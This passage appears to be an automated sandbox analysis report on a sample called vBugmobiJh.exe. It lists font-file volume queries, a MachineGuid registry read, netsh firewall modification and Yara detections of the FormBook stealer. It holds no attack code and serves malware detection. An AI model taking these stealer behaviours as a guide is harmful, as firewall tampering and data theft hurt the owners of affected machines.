          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings:

          Uses netsh to modify the Windows network and firewall settings
          Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.267667639.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.475304202.0000000003350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 6.2.vBugmobiJh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.vBugmobiJh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.vBugmobiJh.exe.382c390.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.vBugmobiJh.exe.387b9b0.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000006.00000002.267925714.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.267841764.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.473763898.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.230287817.00000000036F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.472446069.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
